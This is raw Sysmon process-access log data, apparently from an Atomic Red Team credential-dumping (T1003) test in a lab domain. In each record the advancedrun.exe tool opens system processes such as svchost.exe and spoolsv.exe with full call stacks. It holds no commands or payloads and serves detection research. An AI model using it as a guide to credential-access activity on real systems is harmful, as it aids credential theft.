17:28:39.339{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952223Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.339{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952222Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.339{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003952221Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.339{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952220Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.339{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952219Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.339{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952218Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.339{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952217Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.339{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952216Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.339{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952215Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.339{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003952214Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.339{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003952213Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.339{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952212Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.339{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003952211Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.339{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003952210Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.339{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003952209Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003952208Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000003952207Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 